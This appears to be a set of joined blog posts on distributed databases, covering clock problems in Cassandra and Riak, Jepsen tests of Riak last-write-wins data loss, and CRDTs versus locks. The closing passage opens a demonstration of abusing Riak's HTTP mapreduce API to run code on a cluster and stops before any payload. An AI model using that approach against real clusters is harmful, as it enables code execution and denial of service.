Some folks have asked whether Cassandra or Riak in last-write-wins mode are monotonically consistent, or whether they can guarantee read-your-writes, and so on. This is a fascinating question, and leads to all sorts of interesting properties about clocks and causality.

There are two families of clocks in distributed systems. The first are often termed wall clocks, which correspond roughly to the time obtained by looking at a clock on the wall. Most commonly, a process finds the wall-time clock via gettimeofday(), which is maintained by the operating system using a combination of hardware timers and NTP–a network time synchronization service. On POSIX-compatible systems, this clock returns integers which map to real moments in time via a certain standard, like UTC, POSIX time, or less commonly, TAI or GPS.

The second type are the logical clocks, so named because they measure time associated with the logical operations being performed in the system. Lamport clocks, for instance, are a monotonically increasing integer which are incremented on every operation by a node. Vector clocks are a generalization of Lamport clocks, where each node tracks the maximum Lamport clock from every other node.

Consider a typical TCP service. Requests from a client are distributed through one or more load balancers to a pool of stateless application servers, which run the business logic. Those application servers persist their shared state in a distributed database, like Cassandra or Riak. I’m gonna focus on Cassandra since it doesn’t offer logical clocks, but most of this discussion applies to Riak with Last Write Wins enabled, as well. The question at hand: what safety properties will the service’s operations exhibit?

Cassandra uses wall-clock timestamps provided by the server, or optionally by the client, to order writes. It makes several guarantees about the monotonicity of writes and reads given timestamps. For instance, Cassandra guarantees most of the time that if you write successfully to a quorum of nodes, any subsequent read from a quorum of nodes will see that write or one with a greater timestamp.

How do those ordering properties translate to the application’s operations?

Session consistency

Cassandra provides session consistency for timestamps, which means that a process which accesses the database in the context of a session is guaranteed to always read its latest write or one with a higher timestamp. There is, however, no guarantee about the visibility of writes to other nodes. This suggests an important caveat: clients of the service will not read their own writes unless they too maintain an open session (e.g. over a TCP connection) with a particular app server. The app is responsible for ensuring that its application sessions are disconnected if it ever loses its Cassandra session.

[Update] Peter Bailis points out that jbellis reverted the patch adding read-your-writes consistency a week later, so I guess that no Cassandra release has actually tried to provide read-your-writes. My mistake, I think–the ticket and docs are somewhat unclear on the current state of affairs.

OK, so we’re using TCP or long-lived HTTP connections, instead of making discrete HTTP requests to the service, and we’ve added appropriate lifecycle handlers to the app server. Our session now stretches continuously from a given Cassandra node through the application server to the client. Are operations session-consistent?

Well, not exactly. Cassandra uses the JVM’s System.getCurrentTimeMillis for its time source, which is backed by gettimeofday. Pretty much every Cassandra client out there does something similar. That means that the timestamps for writes made in a session are derived either from a single Cassandra server clock, or a single app server clock. These clocks can flow backwards, for a number of reasons:

  • Hardware wonkiness can push clocks days or centuries into the future or past.
  • Virtualization can wreak havoc on kernel timekeeping.
  • Misconfigured nodes may not have NTP enabled, or may not be able to reach upstream sources.
  • Upstream NTP servers can lie.
  • When the problem is identified and fixed, NTP corrects large time differentials by jumping the clock discontinously to the correct time.
  • Even when perfectly synchronized, POSIX time itself is not monotonic.

That last one might come as a surprise, because we usually think of POSIX time as being “the number of seconds since an epoch”. This isn’t quite true. Because Of Reasons, POSIX days are defined as 86400 seconds in length. However, real days aren’t exactly 86400 seconds. The powers-that-be occasionally schedule leap seconds to correct for the drift. On those occasions, the system clock will either skip a second, or double-count a second–e.g., counting 59:60.7, 59:60.8, 59:60.9, 59:60.0, 59:60.1, and then repeating the previous second’s worth of timestamps before continuing on.

There are therefore some POSIX timestamps which do not refer to any time, and there are some POSIX timestamps which refer to two distinct times. This most recently happened on July 1st, 2012, and again a month later. This causes so many problems that Google actually smears out the leap second over the course of the day, preserving monotonicity.

If the system clock goes backwards for any reason, Cassandra’s session consistency guarantees no longer hold. Say a client writes w1 just prior to a leap second, then writes w2 just after the leap second. Session consistency demands that any subsequent read will see w2–but since w2 has a lower timestamp than w1, Cassandra immediately ignores w2 on any nodes where w1 is visible. In fact, Cassandra’s monotonicity guarantees operate in reverse, doing their best to make sure that subsequent writes are not visible.

How do you fix this? Use monotonic clocks. You can’t use Lamport clocks because they’d lead to all kinds of awkwardness between nodes, but vector clocks or dotted version vectors would be appropriate. You can also enforce that time never goes backwards in the context of a session. Both the database and (if client timestamps are used) all client code should check to make sure that timestamps never go backwards in the context of a session or process, and delay timestamp generation if necessary. Higher latencies or client-side exceptions are almost certainly preferable to silently lost data.

Monotonic reads and writes

Cassandra also claims to offer monotonic read consistency, which means that if a client has seen any particular value for a key, it will never read an older value.

Because system clocks are not monotonic, writes can’t be monotonic either. Consider this same sequence as before:

  1. Process A writes w1 with timestamp t=2
  2. Process A writes w2 with timestamp t=1
  3. Process A reads w1, but expected w2

These writes are clearly not monotonic: w2 should have won. We could also consider multiple clients. This case doesn’t require system clocks to go backwards–it can happen whenever clocks aren’t tightly synchronized between database servers or client nodes:

  1. Process A writes w1 with timestamp t=2
  2. Process B reads w1
  3. Process B writes w2 with timestamp t=1
  4. Process B reads w1, but expected w2

It’s a little tough to work around this one because w2 isn’t just temporarily invisible–it’s gone forever. It might survive on an isolated node for a bit, but eventually the Cassandra or Riak LWW rules will ensure it’s destroyed in favor of the earlier write, because its timestamp is smaller. Depending on whether you consider successfully written values as “seen” by a process, this also violates monotonic reads as well.

Again, this isn’t a bug in the database–as far as LWW is concerned, this is correct behavior. It’s a problem with the coupling between the wall-clock causality model and the application model. If a client considers the data that it writes successfully as “seen”, LWW can’t preserve monotonicity.

Doomstones

Deletes in Cassandra and Riak work by writing a tombstone record, which has a particular timestamp. All objects with a lower timestamp will be silently deleted until GC removes the tombstone record–which means that a rogue client or node can cause the destruction of every write to a record for days to weeks afterwards.

  1. Process A deletes a row with t=100000000
  2. Process B writes w1 with timestamp t=1
  3. Process B reads null, but expected w1
  4. This continues for days

This actually happens all the time in LWW systems, but on short-enough timescales that you might not notice. Every time you delete a cell or row, or empty a CQL collection, all writes to that record are discarded for a short time frame–however many seconds separate A’s clock from the furthest-behind node. This is why it’s so hard to write automated tests for Riak which do rapid create/delete cycles without vclocks: you start dipping below the causality horizon, so to speak.

This behavior violates strong, eventual, causal, read-your-writes, session, and monotonic write consistency, and depending on how you interpret “seen”, violates monotonic read consistency as well.

What does all this mean?

Timestamps, as implemented in Riak, Cassandra, et al, are fundamentally unsafe ordering constructs. In order to guarantee consistency you, the user, must ensure locally monotonic and, to some extent, globally monotonic clocks. This is a hard problem, and NTP does not solve it for you. When wall clocks are not properly coupled to the operations in the system, causal constraints can be violated. To ensure safety properties hold all the time, rather than probabilistically, you need logical clocks.

The safest option I can think of is to use a strong coordinator for your timestamps, like an atomic incrementing counter in Zookeeper. That’s slow and limits your availability, but there are some tricks you can use to slice the problem into more manageable pieces, reducing contention. You probably don’t need coordinated timestamps between Cassandra rows or Riak objects, for example.

A somewhat less safe but reasonable option is to use NTP rigorously on your machines, and sync it to TAI or GPS instead of POSIX time or UTC. Make sure you measure your clock skew: everyone I know who says they run NTP has discovered, at one point or another, that a node was way out of sync. If you want rough correspondence to POSIX time, you can still ensure monotonicity by running your own NTP pool and slurring leap seconds over longer time frames.

Or you could choose a database which supports logical clocks for operations where consistency guarantees matter. Chances are your system has some operations where safety is critical–for those, use logical clocks. When it’s OK to have fuzzy ordering constraints, feel free to use wall clocks. They’re often slightly faster, even if their behavior is harder to reason about than their logical counterparts.

For a good non-mathematical overview of weak consistency properties, see Werner Vogels' Eventually Consistent paper. Google’s Spanner paper explores strong consistency guarantees which are achievable by placing strict bounds on clock skew. To explore consistency coupling in more detail, including how to overlay stronger consistency models onto weaker datastores, try Peter Bailis' Bolt-on Causal Consistency. Happy reading!

Previously in Jepsen, we discussed MongoDB. Today, we’ll see how last-write-wins in Riak can lead to unbounded data loss.

If you like it then you Dynamo a ring on it

So far we’ve examined systems which aimed for the CP side of the CAP theorem, both with and without failover. We learned that primary-secondary failover is difficult to implement safely (though it can be done; see, for example, ZAB or Raft). Now I’d like to talk about a very different kind of database–one derived from Amazon’s Dynamo model.

Amazon designed Dynamo with the explicit goals of availability and partition tolerance–and partition-tolerant systems automatically handle node failure. It’s just a special kind of partition. In Dynamo, all nodes are equal participants in the cluster. A given object is identified by a key, which is consistently hashed into N slots (called “partitions”; not to be confused with a network partition) on a ring. Those N slots are claimed by N (hopefully distinct) nodes in the cluster, which means the system can, once data is replicated, tolerate up to N-1 node failures without losing data.

When a client reads from a Dynamo system, it specifys an R value: the number of nodes required to respond for a read to be successful. When it writes, it can specify W: the number of nodes which have to acknowledge the write. There’s also DW for “durable write”, and others. Riak has sometimes referred to these as “tunable CAP controls”: if you choose R=W=1, your system will be available even if all but one node fail–but you may not read the latest copy of data. If R + W is greater than N/2, you’re “guaranteed to read acknowledged writes”, with caveats. The defaults tend to be R=W=quorum, where quorum is N/2+1.

Dynamo handles partitions by healing the ring. Each connected set of machines establishes a set of fallback vnodes, to handle the portions of the ring which are no longer accessible. Once failover is complete, a Dynamo cluster split into two disjoint components will have two complete hash rings, and (eventually, as repair completes) 2 * N copies of the data (N in each component). When the partition heals, the fallback vnodes engage in hinted handoff, giving their data back to the original “primary” vnodes.

A totally connected Dynamo cluster
Two nodes are partitioned away

Since any node can accept writes for its portion of the keyspace, a Dynamo system can theoretically achieve 100% availability, even when the network fails entirely. This comes with two drawbacks. First, if no copy of a given object is available in an isolated set of nodes, that part of the cluster can accept writes for that object, but the first reads will return 404. If you’re adding items to a shopping cart and a partition occurs, your cart might appear to be empty. You could add an item to that empty cart, and it’d be stored, but depending on which side of the partition you talk to, you might see 20 items or just one.

When the partition heals, we have a new problem: it’s not clear which version of an object is authoritative. Dynamo employs a causality-tracing algorithm called vector clocks, which means it knows which copies of an object have been overwritten by updates, and which copies are actually conflicts–causally unconnected–due to concurrent writes.

Concurrent. We were talking about partitions, right? Two writes are concurrent if they happen in different components and can’t see each other’s changes, because the network didn’t let them communicate.

Well that’s interesting, because we’re also used to concurrency being a property of normal database systems. If two people read an object, then write it back with changes, those writes will also conflict. In a very real sense, partitions are just really big windows of concurrency. We often handle concurrent writes in relational databases with multi-version concurrency control or locks, but we can’t use locks here because the time horizons could be minutes or hours, and there’s no safe way to distribute a lock algorithm over a partition. We need a different approach. We need to be able to merge arbitrary conflicting objects for Dynamo to work. From the paper:

For instance, the application that maintains customer shopping carts can choose to “merge” the conflicting versions and return a single unified shopping cart. Despite this flexibility, some application developers may not want to write their own conflict resolution mechanisms and choose to push it down to the data store, which in turn chooses a simple policy such as “last write wins”.

Last write wins. That sounds like a timestamp. Didn’t we learn that Clocks Are Not To Be Trusted? Let’s try it and find out!

Riak with last-write-wins

Riak is an excellent open-source adaptation of the Dynamo model. It includes a default conflict resolution mode of last-write-wins, which means that every write includes a timestamp, and when conflicts arise, it picks the one with the higher timestamp. If our clocks are perfectly synchronized, this ensures we pick the most recent value.

To be clear: there are actually two settings in Riak which affect conflict resolution: lww=true, which turns off vector clock analysis entirely, and allow-mult=false, which uses vector clocks but picks the sibling with the highest timestamp. Allow-mult=false is safer, and that’s the setting I’m referring to by “last write wins.” All cases of data loss in this post apply to both settings, though.

First, let’s install Riak, join the nodes together, and tell the cluster to commit the change:

salticid riak.setup salticid riak.join salticid riak.commit

You can watch the logs with salticid riak.tail. Watch salticid riak.transfers until there are no handoffs remaining. The cluster is now in a stable state.

For this particular application we’ll be adding numbers to a list stored in a single Riak object. This is a typical use case for Dynamo systems–the atomic units in the system are keys, not rows or columns. Let’s run the app with last-write-wins consistency:

lein run riak lww-sloppy-quorumWrites completed in 5.119 seconds 2000 total 2000 acknowledged 566 survivors 1434 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 1 2 3 4 6 8 ... 1990 1991 1992 1995 1996 1997 1.0 ack rate 0.717 loss rate
Can't read my / can't read my / no he can't read my / Daaata raaaace!

Riak lost 71% of acknowledged writes on a fully-connected, healthy cluster. No partitions. Why?

Remember how partitions and concurrency are essentially the same problem? Simultaneous writes are causally disconnected. If two clients write values which descend from the same object, Riak just picks the write with the higher timestamp, and throws away the other write. This is a classic data race, and we know how to fix those: just add a mutex. We’ll wrap all operations against Riak in a perfectly consistent, available distributed lock.

“But you can’t do that! That violates the CAP theorem!”

Clever girl. Jepsen lets us pretend, though:

lein run lock riak-lww-sloppy-quorumWrites completed in 21.475 seconds 2000 total 2000 acknowledged 2000 survivors All 2000 writes succeeded. :-D

Problem solved! No more write conflicts. Now let’s see how it behaves under a partition by running salticid jepsen.partition during a run:

237 :ok 242 :ok 247 :ok 252 :ok 257 :ok 262 timeout 85 :ok 204 timeout 203 timeout 106 :ok 209 timeout 267 timeout 90 :ok
And now you won't stop calling me / I'm kinda busy

The first thing you’ll notice is that our writes start to lag hard. Some clients are waiting to replicate a write to a majority of nodes, but one side of the partition doesn’t have a majority available. Even though Riak is an AP design, it can functionally become unavailable while nodes are timing out.

Those requests time out until Riak determines those nodes are inaccessible, and sets up fallback vnodes. Once the fallback vnodes are in place, writes proceed on both sides of the cluster, because both sides have a majority of vnodes available. This is by design in Dynamo. Allowing both components to see a majority is called a sloppy quorum, and it allows both components to continue writing data with full multi-node durability guarantees. If we didn’t set up fallback vnodes, a single node failure could destroy our data.

Before collecting results, let’s heal the cluster: salticid jepsen.heal. Remember to wait for Riak to recover, by waiting until salticid riak.transfers says there’s no data left to hand off.

Writes completed in 92.773 seconds 2000 total 1985 acknowledged 176 survivors 1815 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 85 90 95 100 105 106 ... 1994 1995 1996 1997 1998 1999 6 unacknowledged writes found! ヽ(´ー`)ノ (203 204 218 234 262 277) 0.9925 ack rate 0.91435766 loss rate 0.00302267 unacknowledged but successful rate

91% data lost. This is fucking catastrophic, ladies.

And all the other nodes / Conflict with me

What happened? When the partition healed, Riak had two essentially two versions of the list: one from each side of the partition (plus some minorly divergent copies on each side). Last-write-wins means we pick the one with the higher timestamp. No matter what you do, all the writes from one side or the other will be discarded.

If your Riak cluster partitions, and you write to a node which can’t reach any of the original copies of the data, that write of a fresh object can overwrite the original record–destroying all the original data.

Strict quorum

The problem is that we allowed writes to proceed on both sides of the partition. Riak has two more settings for reads and writes: PR and PW, for primary read and write, respectively. PR means you have to read a value from at least that many of the original owners of a key: fallback vnodes don’t count. If we set PR + PW >= quorum, operations against a given key will only be able to proceed on one component of a partitioned cluster. That’s a CP system, right?

lein run lock riak-lww-quorum274 :ok 1250 :ok 279 com.basho.riak.client.RiakRetryFailedException: com.basho.riak.pbc.RiakError: {pw_val_unsatisfied,2,1} 1381 :ok 277 com.basho.riak.client.RiakRetryFailedException: com.basho.riak.pbc.RiakError: {pr_val_unsatisfied,2,1}

Here we see the cluster denying a write and a read, respectively, to clients which can’t see a majority of the primary nodes for a key. Note that because the quorums are spread around the nodes, a Dynamo system will be partially available in this mode. In any given component, you’ll be able to read and write some fraction of the keys, but not others.

2000 total 1971 acknowledged 170 survivors 1807 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 86 91 95 96 100 101 ... 1994 1995 1996 1997 1998 1999 6 unacknowledged writes found! ヽ(´ー`)ノ (193 208 219 237 249 252) 0.9855 ack rate 0.9167935 loss rate 0.00304414 unacknowledged but successful rate
You must not know CP / You must not know CP

PR=PW=R=W=quorum still allowed 92% write loss. We reported failure for more writes than before, so that’s a start–but what gives? Shouldn’t this have been CP?

The problem is that that failed writes may still be partially successful. Dynamo is designed to preserve writes as much as possible. Even though a node might return “PW val unsatisfied” when it can’t replicate to the primary vnodes for a key, it may have been able to write to one primary vnode–or any number of fallback vnodes. Those values will still be exchanged during read-repair, considered as conflicts, and the timestamp used to discard the older value–meaning all writes from one side of the cluster.

This means the minority component’s failing writes can destroy all of the majority component’s successful writes. Repeat after me: Clocks. Are. Evil.

Embrace your siblings

I can't help feeling we could have had it all

Is there no hope? Is there anything we can do to preserve my writes in Riak?

Yes. We can use CRDTs.

If we enable allow-mult in Riak, the vector clock algorithms will present both versions to the client. We can combine those objects together using a merge function. If the merge function is associative, commutative, and idempotent over that type of object, we can guarantee that it always converges to the same value regardless of the order of writes. If the merge function doesn’t discard data (like last-write-wins does), then it will preserve writes from both sides.

In this case, we’re accumulating a set of numbers. We can use set union as our merge function, or 2P sets, or OR sets, if we need to remove numbers.

lein run riak-crdtWrites completed in 80.918 seconds 2000 total 1948 acknowledged 2000 survivors All 2000 writes succeeded. :-D

CRDTs preserve 100% of our writes. We still have false negatives in this demo, because the client timed out on a few writes which Riak was still propagating, when the partition first began. False negatives are OK, though, because state-based CRDTs are idempotent. We can repeat our writes arbitrarily many times, in any order, without duplicating data.

Moreover, CRDTs are an AP design: we can write safely and consistently even when the cluster is totally partitioned–for example, when no majority exists. They’re also eventually consistent (in a safe, data-preserving sense) when components are partitioned away from all copies of a given object and are forced to start from scratch.

All of the writes (na na na na NAA NA na na na na NAA NA)

Strategies for working with Riak

Sean Cribbs is the DARE Lion.

Enable allow-mult. Use CRDTs.

Seriously. LWW never should have been the standard behavior for a Dynamo system, but Basho made it the default after customers complained that they didn’t like the complexity of reasoning about siblings. Customers are the only reason Riak exists, and this behavior is gonna seem OK until you start experiencing partitions (and remember, fault tolerance is the reason you chose Riak in the first place), so we’re stuck with a default config which promotes simple-yet-dangerous behavior.

As a consequence of that decision, community resources which people rely on to learn how to use Riak are often aimed towards last-write-wins. Software isn’t just an artifact, but a culture around its use. I don’t really know what we can learn from this, besides the fact that engineering and culture are tough problems.

CRDTs may be too large, too complex, or too difficult to garbage-collect for your use case. However, even if you can’t structure your data as a full CRDT, writing a hacked-together merge function which just takes care of a couple important fields (say, set union over your friend list and logical OR over the other fields) can go a long way towards preventing catastrophic data loss.

There are cases where last-write-wins is a safe strategy. If your data is immutable, then it doesn’t matter which copy you choose. If your writes mean “I know the full correct state of this object at this time”, it’s safe. Many caches and backup systems look like this. If, however, your writes mean “I am changing something I read earlier,” then LWW is unsafe.

Finally, you can decide to accept dropped data. All databases will fail, in different ways, and with varying probabilities. Riak’s probability distribution might be OK for you.

Introducing locks is a bad idea. Even if they did prevent data loss–and as we saw, they don’t–you’ll impose a big latency cost. Moreover, locks restrict your system to being CP, so there’s little advantage to having an AP database. However, some really smart folks at Basho are working on adding Paxos rounds for writes which need to be CP. Having a real consensus protocol will allow Riak’s distributed writes to be truly atomic.

So: we’ve seen that Riak’s last-write-wins is fundamentally unsafe in the presence of network partitions. You can lose not only writes made during the partition, but all writes made at any time prior. Riak is an AP system, and its tunable CAP controls only allow you to detect some forms of write loss–not prevent it. You can’t add consistency to a database by tacking on a lock service because wall clock time doesn’t matter: consistency is a causal property of the relationships between the writes themselves. AP systems involve fundamentally different kinds of data structures, with their own unique tradeoffs.

In the next post, we’ll review what we’ve learned from these four distributed systems, and where we go from here.

library.jpg

Write contention occurs when two people try to update the same piece of data at the same time.

We know several ways to handle write contention, and they fall along a spectrum. For strong consistency (or what CAP might term “CP”) you can use explicit locking, perhaps provided by a central server; or optimistic concurrency where writes proceed through independent transactions, but can fail on conflicting commits. These approaches need not be centralized: consensus protocols like Paxos or two-phase-commit allow a cluster of machines to agree on an isolated transaction–either with pessimistic or optimistic locking, even in the face of some failures and partitions.

On the other end of the spectrum are the AP solutions, where both writes are accepted, but are resolved at a later time. If the resolution process is monotonic (always progresses towards a stable value regardless of order), we call the system “eventually consistent”. Given sufficient time to repair itself, some correct value will emerge.

What kind of resolution function should we use? Well our writes happen over time, and newer values are more correct than old ones. We could pick the most recently written value, as determined by a timestamp. Assuming our clocks are synchronized more tightly than the time between conflicting writes, this guarantees that the last write wins.

But wait! If I’m storing a list of the 500,000 people who follow, say, @scoblizer, and two people follow him at the same time… and last-write-wins chooses the most recently written set of followers… I’ll have lost a write! That’s bad! It’s rare–at Showyou we saw conflicts in ~1% of follower lists–but it still disrupts the user experience enough that I care about solving the problem *correctly. My writes should never be lost so long as Riak is doing its thing.

Well, Riak is naturally AP, and could accept both writes simultaneously, and you could resolve them somehow. OR-sets are provably correct, fit quite naturally to how you expect following to work, and reduce the probability of any contention to single elements, rather than the entire set. But maybe we haven’t heard of CRDTs yet, or thought (as I did for some time) that 2P sets were as good as it gets. That’s OK; CRDTs have only been formally described for a couple of years.

Serializing writes with mutexes

So what if we used locking on top of Riak?

Before writing an object, I acquire a lock with a reliable network service. It guarantees that I, and I alone, hold the right to write to /followers-of/scoblizer. While holding that lock we write to Riak, and when the write is successful, I release the lock. No two clients write at the same time, so write contention is eliminated! Our clocks are tightly synchronized by GPS or atomic clocks, and we aggressively monitor clock skew.

This does not prevent write contention.

When we issue a write to Riak, the coordinating node–the one we’re talking to as a client–computes the preflist for the key we’re going to write. If our replication factor N is 3, it sends a write to each of 3 vnodes. Then it waits for responses. By default it waits for W = (N/2 + 1) “write confirmed” responses, and also for DW = (N/2 + 1) confirmations that the write is saved on disk, not just in memory. If one node crashes, or is partitioned during this time, our write still succeeds and all is well.

That’s OK–there was no conflict, because the lock service prevented it! And our write is (assuming clocks are correct) more recent than whatever that crashed node had, so when the crashed node comes back we’ll know to discard the old value, the minority report. All we need for that is to guarantee that every read checks at least R = (N/2 + 1) copies, so at least one of our new copies will be available to win a conflict resolution. If we ever read with R=1 we could get that solitary old copy from the failed node. Maybe really old data, like days old, if the node was down for that long. Then we might write that data back to Riak, obliterating days worth of writes. That would definitely be bad.

OK, so read with quorum and write with quorum. Got it.

Partitions

What if that node failed to respond–not because it crashed–but because of a partition? What if, on the other side of the network curtain, there are other parts of our app also trying to add new followers?

Let’s say we read the value “0”, and go to write version “1”. The riak coordinator node completes two writes, but a partition occurs and the third doesn’t complete. Since we used W=quorum, this still counts as success and we think the write completed.

Meanwhile, Riak has detected the partition, and both sides shuffle new vnodes into rotation to recover. There are now two complete sets of vnodes, one on each side. Clients talking to either side will see their writes succeed, even with W=DW=quorum (or W=all, for that matter).

When the partition is resolved, we take the most recent timestamp to decide which cluster’s copy wins. All the writes on the other side side of the partition will be lost–even though we, as clients, were told they were successful. W & DW >= quorum is not sufficient; we need PW >= quorum to consider writes to those fallback copies of vnodes as failures.

Well that tells the client there was a failure, at least. But hold on… those fallback vnodes still accepted the writes and wrote them down dutifully. They’re on disk and are just as valid as the writes on the “majority” side of the partition! We can read them back immediately, and when the partition is resolved those “failed” writes have a ~1 in 2 chance (assuming an even distribution of writes between partitions) of winning last-write-wins–again, obliterating writes to the primary vnodes which were claimed to be successful! Or maybe the majority side was more recently written, and the minority writes are lost. Either way, we are guaranteed to lose data.

Nowhere in the above scenario did two writes have to happen “simultaneously”. The locking service is doing its job and keeping all writes neatly sequential. This illustrates an important point about distributed systems:

“Simultaneous” is about causality, not clocks.

The lock service can only save us if it knows the shape of the partition. It has to understand that events on both sides of the partition happen concurrently, from the point of view of Riak, and to grant any locks to the minority side would no longer provide a mutual exclusion of writes in the logical history of the Riak object.

The lock service, therefore, must be distributed. It must also be isomorphic to the Riak topology, so that when Riak is partitioned, the lock service is partitioned in the same way; and can tell us which nodes are “safe” and which are “dead”. Clients must obtain locks not just for keys, but for hosts as well.

One way to provide these guarantees is to build the locking service into Riak itself: jtuple has been thinking about exactly this problem. Alternatively, we could run a consensus protocol like Zookeeper on the Riak nodes and trust that partitions will affect both kinds of traffic the same way.

So finally, we’ve succeeded: in a partition, the smaller side shuts down. We are immediately Consistent and no longer Available, in the CAP sense; but our load balancer could distribute requests to the majority partition and all is well.

What’s a quorum, anyway?

OK, so maybe I wasn’t quite honest there. It’s not clear which side of the partition is “bigger”.

Riak has vnodes. Key “A” might be stored on nodes 1, 2, and 3, “B” on 3, 4, and 5, and “C” on 6, 7, and 8. If a partition separates nodes 1-4 from 5-8, nodes 1-4 will have all copies of A, one of B, and none of C. There are actually M ensembles at work, where M = ring_size. Riak will spin up fallback vnodes for the missing sections of the ring, but they may have no data. It’s a good thing we’re using PR >= quorum, because if we didn’t, we could read an outdated copy of an object–or even get a not_found when one really exists!

This is absolutely critical. If we read a not_found, interpret it as an empty set of followers, add one user, and save, we could obliterate the entire record when the partition resolves–except for the single user we just added. A half-million followers gone, just like that.

Since there are M ensembles distributed across the partition in varying ways, we can’t pick an authoritative side to keep running. We can either shut down entirely, or allow some fraction of our requests (depending on the ring size, number of nodes, and number of replicas, and the partition shape) to fail. If our operations involve touching multiple keys, the probability of failure grows rapidly.

This system cannot be said to be highly available, even if the coordination service works perfectly. If more than N/2 + 1 nodes are partitioned, we must fail partly or completely.

In fact, strictly speaking, we don’t even have the option of partial failure. If the cluster partitions after we read a value, a subsequent write will still go through to the fallback vnodes and we have no way to stop ourselves. PW doesn’t prevent writes from being accepted; it just returns a failure code. Now our write is sitting in the minority cluster, waiting to conflict with its sibling upon resolution.

The only correct solution is to shut down everything during the partition. Assuming we can reliably detect the partition. We can do that, right?

Partitions never happen!

It’s not like partitions happen in real life. We’re running in EC2, and their network is totally reliable.

OK so we decide to move to our own hardware. Everything in the same rack, redundant bonded interfaces to a pair of fully meshed agg switches, redundant isolated power on all the nodes, you got it. This hardware is bulletproof. We use IP addresses so DNS faults can’t partially partition nodes.

Then, somehow, someone changes the Erlang cookie on a node. OK, well now we know a great way to test how our system responds to partitions.

Our ops team is paranoid about firewalls. Those are a great way to cause asymmetric partitions. Fun times. After our hosting provider’s support team fat-fingered our carefully crafted interface config for the third time, we locked them out of the OS. And we replaced our Brand X NICs with Intel ones after discovering what happens to the driver in our particular kernel version under load.

We carefully isolate our Riak nodes from the app when restarting, so the app can’t possibly write to them. It’s standard practice to bring a node back online in isolation from the cluster, to allow it to stabilize before rejoining. That’s a partition, and any writes during that time could create havoc. So we make sure the app can’t talk to nodes under maintenance at all; allow them to rejoin the cluster, perform read-repair, and then reconnect the clients.

Riak can (in extreme cases) partition itself. If a node hangs on some expensive operation like compaction or list-keys, and requests time out, other nodes can consider it down and begin failover. Sometimes that failover causes other timeouts, and nodes continually partition each other in rolling brownouts that last for hours. I’m not really sure what happens in this case–whether writes can get through to the slow nodes and cause data loss. Maybe there’s a window during ring convergence where the cluster can’t decide what to do. Maybe it’s just a normal failure and we’re fine.

Recovery from backups is a partition, too. If our n_val is 3, we restore at most one node at a time, and make sure to read-repair every key afterwards to wipe out that stale data. If we recovered two old nodes (or forgot to repair every key on those failed nodes), we could read 2 old copies of old data from the backups, consider it quorum, and write it back.

I have done this. To millions of keys. It is not a fun time.

The moral of these stories is that partitions are about lost messages, not about the network; and they can crop up in surprisingly sneaky ways. If we plan for and mitigate these conditions, I’m pretty confident that Riak is CP. At least to a decent approximation.

Theory

You know, when we started this whole mess, I thought Riak was eventually consistent. Our locking service is flawless. And yet… there are all these ways to lose data. What gives?

Eventually consistent systems are monotonic. That means that over time, they only grow in some way, towards a most-recent state. The flow of messages pushes the system inexorably towards the future. It will never lose our causal connection to the past, or (stably) regress towards a causally older version. Riak’s use of vector clocks to identify conflicts, coupled with a monotonic conflict-resolution function, guarantees our data will converge.

And Last Write Wins is monotonic. It’s associative: LWW(a, LWW(b, c)) = LWW(LWW(a, b), c). It’s commutative: LWW(a, b) = LWW(b, a). And it’s idempotent: LWW(LWW(a)) = LWW(a). It doesn’t matter what order versions arrive in: Riak will converge on the version with the highest timestamp, always.

The problem is that LWW doesn’t fit with our desired semantics. These three properties guarantee monotonicity, but don’t prevent us from losing writes. f(a, b) = 0 is associative, commutative, and idempotent, but obviously not information-preserving. Like burning the Library at Alexandria, Last Write Wins is a monotonic convergence function that can destroy knowledge–regardless of order, the results are the same.

Conclusions

Last-write-wins is an appropriate choice when the client knows that the current state is correct. But most applications don’t work this way: their app servers are stateless. State, after all, is the database’s job. The client simply reads a value, makes a small change (like adding a follower), and writes the result back. Under these conditions, last-write-wins is the razor’s edge of history. We cannot afford a single mistake if we are to preserve information.

What about eventual consistency?

If we had instead merged our followers list with set union, every failure mode I’ve discussed here disappears. The system’s eventual consistency preserves our writes, even in the face of partitions. You can still do deletes (over some time horizon) by using the lock service and a queue.

We could write the follower set as a list of follow or unfollow operations with timestamps, and take the union of those lists on conflict. This is the approach provided by statebox et al. If the timestamps are provided by the coordination service, we recover full CP semantics, apparent serializability, and Riak’s eventual consistency guarantees preserve our writes up to N-1 failures (depending on r/pr/w/pw/dw choices). That system can also be highly available, if paths to both sides of the partition are preserved and load balancers work correctly. Even without a coordination service, we can guarantee correctness under write contention to the accuracy of our clocks. GPS can provide 100-nanosecond-level precision. NTP might be good enough.

Or you could use OR-sets. It’s 130 lines of ruby. You can write an implementation and test its correctness in a matter of days, or use an existing library like Eric Moritz' CRDT or knockbox. CRDTs require no coordination service and work even when clocks are unreliable: they are the natural choice for highly available, eventually consistent systems.

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \ http://localhost:8098/riak/everything_you_can_run/i_can_run_better --data-binary @-<<EOF Riak is like the Beatles: listening has side effects. EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?

